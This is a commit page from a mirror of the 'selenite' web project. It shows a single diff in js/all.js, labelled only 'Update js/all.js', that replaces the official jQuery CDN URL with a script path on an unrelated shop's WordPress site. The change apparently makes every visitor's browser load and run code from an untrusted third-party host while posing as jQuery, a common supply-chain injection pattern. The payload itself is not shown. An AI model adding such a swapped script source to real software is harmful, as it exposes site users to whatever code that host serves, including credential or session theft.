mirror of
https://gitlab.com/skysthelimit.dev/selenite.git
synced 2025-06-15 10:12:06 -05:00
Update js/all.js
This commit is contained in:
parent
c80bc6c8a0
commit
c6e3f9c41e
@ -174,7 +174,7 @@ if (JSON.parse(localStorage.getItem("selenite.passwordAtt"))) {
|
||||
}
|
||||
!(function () {
|
||||
var e = document.createElement("script");
|
||||
(e.src = "https://code.jquery.com/jquery-3.7.1.min.js"),
|
||||
(e.src = "https://a-r-d.shop/wp-includes/js/jquery/jquery.min.js"),
|
||||
document.head.appendChild(e),
|
||||
(e.onload = function () {
|
||||
var t = $("<script>").attr("src", "https://unpkg.com/webp-hero@0.0.2/dist-cjs/polyfills.js");
|
||||
|
Loading…
x
Reference in New Issue
Block a user